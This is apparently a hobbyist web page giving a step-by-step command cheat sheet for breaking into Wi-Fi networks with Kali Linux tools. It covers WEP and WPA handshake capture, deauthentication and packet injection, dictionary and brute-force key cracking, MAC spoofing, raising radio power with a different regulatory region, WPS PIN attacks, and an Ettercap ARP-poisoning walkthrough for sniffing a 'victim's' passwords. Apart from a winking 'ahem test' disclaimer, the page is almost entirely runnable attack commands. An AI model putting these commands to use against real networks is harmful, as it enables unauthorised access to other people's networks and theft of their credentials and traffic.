Wireless Security Analyzing Commands -
these terminal commans are to 'ahem' test the security of your network
EMail  
............................
Kali Linux
KDE Edition
  Terminal Commands In SU Mode  
  Cracking WEP  
 
    ****** SCANNING & COLLECTING ******  
  airodump-ng -c 06 --ivs -w dump wlan0  
  ---------- { or to scan all channels  
  airodump-ng --ivs -w dump wlan0  
     
    ****** FAKE AUTHERING *******  
  aireplay-ng -1 0 -e NAME -a TT:AA:RR:GG:EE:TT -h FF:AA:KK:EE:MM:CC wlan0  
  ---------- { or for tricky routers  
  aireplay-ng -1 600 -o 1 -q 10 -e NAME -a TT:AA:RR:GG:EE:TT -h FF:AA:KK:EE:MM:CC wlan0  
  ( 6000 = Reauth every 600 seconds, -o 1 = Send only 1 set of packets at a time, -q 1- = Send keep alive packets every 10 seconds )  
     
    ****** INJECTING *******  
  aireplay-ng --arpreplay -b TT:AA:RR:GG:EE:TT -h UU:SS:EE:II:NN:GG wlan0  
     
   ****** SENDING RECIEVED PACKET INJECTING *******  
  aireplay-ng -2 -p 0841 -c MM:YY:MM:AA:CC:AA -b TT:AA:RR:GG:EE:TT -h MM:YY:MM:AA:CC:AA wlan0  
     
    ****** DE - AUTHERING *******  
  aireplay-ng -0 1 -a TT:AA:RR:GG:EE:TT -c UU:SS:EE:II:NN:GG wlan0  
     
    ****** CRACKING *******  
  aircrack-ng -b TT:AA:RR:GG:EE:TT dump-01.ivs  
  ---------- { or choosing between 64bit & 128bit Wep  
  aircrack-ng -n 64 dump-01.ivs  
     
  wifiCracking WPA wifi  
     
   ****** SCANNING & COLLECTING ******  
  ( -a = filter associated clients only, -c = channel, -w = write )  
  airodump-ng -a -c 6 -w psk wlan0  
  ---------- { or to scan all channels  
  airodump-ng -a -w psk wlan0  
  ---------- { or to scan only a specific client  
  airodump-ng -a -c 6 --bssid TT:AA:RR:GG:EE:TT -w psk wlan0  
  ---------- { or to scan & collect only the .cap file  
  airodump-ng -a --output-format pcap -w psk wlan0  
  ---------- { cmbined to scan a specific client on a specific channel collecting the cap file  
  airodump-ng -a -c 9 --output-format pcap --bssid 00:18:39:A2:65:26 -w psk wlan0  
  ( --note-- pressing the TAB buttong puts it in select mode, scrolling down the list of AP's shows up the associated clients )  
  ( --note-- pressing the S button changes the list priority, e.g list by AP, Signal, SSID, Encryption etc.. )  
     
    ****** DE - AUTHERING *******  
  aireplay-ng -0 1 -a TT:AA:RR:GG:EE:TT -c UU:SS:EE:II:NN:GG wlan0  
  ( 1 is the number of deauths to send, 0 means send them continuously.. )  
     
    ****** CRACKING *******  
  aircrack-ng -w Passwords/passwords.lst psk*.cap  
  ---------- { or to crack using Kismet files  
  aircrack-ng -w Passwords/passwords.lst Kismet*.dump  
     
  wifiMisc Commands wifi  
     
    ****** CHANGING MAC ADDRESS OF CARD *******  
  ifconfig wlan0 hw ether NN:EE:WW:MM:AA:CC  
    ****** STOPPING & STARTING THE WIFI CARD IN MONITOR MODE *******  
  airmon-ng stop wlan0  
  airmon-ng start wlan0  
    ****** INCREASING POWER ON WIFI CARD *******  
  iw reg set BO  
    ****** CHECKING POWER ON WIFI CARD *******  
  iw list  
    ****** EXTRACTING HANDSHAKES FROM LARGE CAP FILES *******  
  tshark -r 'psk-01.cap' -R "eapol || wlan.fc.type_subtype == 0x08" -w 'new.cap'  
  ( This extracts all handshakes and beacon packets from the cap file & creates a new file )  
  tshark -r 'psk-01.cap' -R "eapol || wlan_mgt == 00:14:6C:7E:40:80" -w 'new.cap'  
  ( This extracts the handshake and beacon packet of a specified client from the cap file & creates a new file )  
     
  wifiOther Cracking Commands wifi  
   ♦     Using Aircrack  
     
  aircrack-ng -w '/media/Data/Dictionaries/Ultimate.txt' psk*.cap  
  aircrack-ng -w '/media/Data/Dictionaries/Ultimate.txt' Kismet*.dump  
  aircrack-ng -w '/media/Data/Dictionaries/Numbers.txt' psk*.cap  
  aircrack-ng -w '/media/Data/Dictionaries/Numbers.txt' Kismet*.dump  
     
  ♦      Using Pyrit  
     
  pyrit -r "/home/macmon/psk*.cap" -i "/media/Data/Dictionaries/Ultimate.txt" attack_passthrough  
  pyrit -r "/home/macmon/psk*.cap" -i "/media/Data/Dictionaries/Numbers.txt" attack_passthrough  
     
   ♦     Using Crunch To Generate Passwords  
     
  crunch 10 10 0123456789ABCDEF | pyrit -r "/home/macmon/psk-01.cap" -e "NAME" -i - attack_passthrough  
  ( This uses 10 digit hex on a given client taken from the cap file )  
  crunch 8 8 0123456789 | pyrit -r "/home/macmon/psk-01.cap" -e "NAME" -i - attack_passthrough  
  ( This uses 8 digit numbers on a given client taken from the cap file )  
  crunch 10 10 1234567890ABCDEF | aircrack-ng -b MM:AA:CC:MM:AA:CC -w - /home/macmon/psk-01.cap  
  ( This uses 10 digit hex on a given client taken from the cap file )  
  crunch 8 8 1234567890 | aircrack-ng -b MM:AA:CC:MM:AA:CC -w - /home/macmon/psk-01.cap  
  ( This uses 8 digit numbers on a given client taken from the cap file )  
     
  ♦      Using Cowpatty With Rainbow Tables  
     
  cowpatty -s 2WIRE031 -d media/Extra/rainbow-tables/wpa_tables/xaa-0/2WIRE031 -r psk*cap  
  ( 2WIRE031 is an example, using a rainbow table file stored on the pc , change accordingly )  
     
   ♦   Other Pyrit Commands  
     
  pyrit list_cores  
  ---------- { lists available cores for cracking  
  pyrit benchmark  
  ---------- { tests pyrit for cracking speed  
  pyrit -r "/home/macmon/psk-01.cap"  
  ---------- { examines the cap file for valid handshake  
     
  wifi Ettercap (middle man exploit)wifi  
   ♦    Using Ettercap  
     
  In Sniff menu select "unified sniffing" - select the network interface e.g wlan0  
  In Host menu select "scan for hosts" - this finds anyone logged onto the network your targetting and on..  
  if you dont want to arp poison attack and just do a descreet scan  
  on the router and clients just click "start sniffing" in the start menu..  
  In Host menu select "host list" - this shows the computers logged onto the target network..  
  Click once on the gateway i.p e.g 192.168.1.1 so its highlighted, then click add to target 1  
  Click once on the ip address of the victim (client) e.g 192.168.1.102 so it highlights then click add to target 2  
  In View menu select "statistics",  
  In Targets menu select "current targets"  
  In Mitm nenu select "Arp Poisoning", in the box tick "sniff remote connections"  
  In Start menu, select "stop sniffing" then select "start sniffing"  
  watch the bottom window for passwords and web address from the client (victim)  
  -you can also log the info easily by slecting logging - "log user messages"
 
     
  wifi WPS Exploit (cracking wpa Using Reaver and WPSCrack - (Terminal)wifi  
   ****** PUT THE WIFI ADAPTOR IN MONITOR MODE*******  
  airmon-ng start wlan0  
     
  Scanning for an access point to attack, and copy its 'mac' (TARGET) address for later ...  
     
   ♦    Wash (a terminal util part of the reaver installation)  
  Wash is a utility for identifying WPS enabled access points. It can survey from a live interface:  
     
  wash -i mon0  
 

By default, wash will perform a passive survey. However, wash can be instructed to send probe requests
to each AP in order to obtain more information about the AP:

 
  wash -i mon0 --scan  
  Too Fix a screen full of these - Found packet with bad FCS, skipping...  
  wash -i mon0 -C -s  
  Wash will only show access points that support WPS  
     
   ♦    Reaver - ( terminal version not gui )  
     
    ****** PUT THE WIFI ADAPTOR IN MONITOR MODE*******  
  airmon-ng start wlan0  
  This puts the card in monitor mode, take note of the mon number it allocates, i.e either mon0 or mon1 etc)  
  ****** ATTACK THE VICTIM *******  
  reaver -i mon0 -b TT:AA:RR:GG:EE:TT -vv  
  Wait -- could take some hours..  
     
  The gui version does pretty much the same as terminal version ....  
     
   ♦    WPSCrack  
     
    ****** PUT THE WIFI ADAPTOR IN MONITOR MODE*******  
  airmon-ng start wlan0  
  This puts the card in monitor mode, take note of the mon number it allocates, i.e either mon0 or mon1 etc)  
     
   ****** ATTACK THE VICTIM *******  
  cd to the directory where WPSCrack is located  
  ./wpscrack.py --iface mon0 --client MM:YY:MM:AA:CC:AA --bssid TT:AA:RR:GG:EE:TT --ssid testap -v  
  if WPSCrack is in the usr/bin directory then there is no need to cd to the directory and then use the command below  
  .wpscrack.py --iface mon0 --client MM:YY:MM:AA:CC:AA --bssid TT:AA:RR:GG:EE:TT --ssid testap -v  
  Wait -- could take some hours..  
     
     
 
________________________________________________________
 
     
                              Webpage designed by Bucky © M6VUK